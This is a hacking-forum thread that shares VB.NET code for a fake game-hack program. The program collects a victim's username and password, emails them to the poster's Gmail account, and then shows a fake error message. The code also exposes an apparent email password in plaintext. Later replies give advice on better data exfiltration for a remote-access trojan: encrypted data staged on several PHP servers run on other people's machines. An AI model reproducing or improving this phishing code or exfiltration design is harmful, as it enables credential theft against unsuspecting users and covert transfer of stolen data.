![]() |
|
Tutorial KEYLOGGER with GMAIL account - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.li/Forum-Visual-Basic-NET-Framework) +--- Thread: Tutorial KEYLOGGER with GMAIL account (/Thread-Tutorial-KEYLOGGER-with-GMAIL-account) |
KEYLOGGER with GMAIL account - Zaisen - 03-01-2017 clearly tutorial VIDEO CODE Imports System.Net.Mail Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("mychatboxnielmar@Gmail.com") MyMailMessage.To.Add("mychatboxnielmar@Gmail.com") MyMailMessage.Subject = ("LEAGUE OF LEGENDS HACK") MyMailMessage.Body = ("Username: >>>" + TextBox1.Text + "<<< AND >>>" + "Password: >>>" + TextBox2.Text + "<<<") Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("mychatboxnielmar@Gmail.com", "020596nielmar") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) MsgBox("Fatal Error! 0x23324 Can not connect to account!", MsgBoxStyle.Critical) End Sub RE: KEYLOGGER with GMAIL account - Bish0pQ - 03-01-2017 Please use "[code]" tags for encapsulating your code. Regarding the code, no, no, no. This was one of the first things I made, a "phisher". I highly recommend NOT using this code. If you create a program with that piece of code, you can easily reverse engineer it and get the login credentials, especially since you store them in plaintext in your program, they're not even encrypted. RE: KEYLOGGER with GMAIL account - Zaisen - 03-02-2017 (03-01-2017, 12:59 PM)Bish0pQ Wrote: Please use "[code]" tags for encapsulating your code. sir if i do that i can't post a tread error cannot post more php? i think RE: KEYLOGGER with GMAIL account - lsp - 03-19-2017 There's also the potential to get the account blocked by google in the case of your rat getting a lot of installs in short time, thus lots of messages going out in short time. Or would this not count if emails are going to self? I dunno. Ignore me. Bish0pQ makes the best point - hard coded creds are bad. I'd consider another exfiltration method. Possibly a php script that does some checks on the client to make sure it's genuine before accepting its requests, you should compress and encrypt your exfil data before sending to your php base. This has some redundancy in that you can upload the php to multiple places, if one fails the rat can go to the next one. Because data in encrypted, it's safe to do it on other peoples servers, just pick up the files from all servers and decrypt at home. To avoid leaving your unencypted data on other servers. There's a lot of extra layers you could put into this. You might be excited to get your project off the ground and go live but it will all be for nothing if your data exfiltration method fails. Do it right the first time. RE: KEYLOGGER with GMAIL account - pvnk - 03-19-2017 video is no longer available good sir |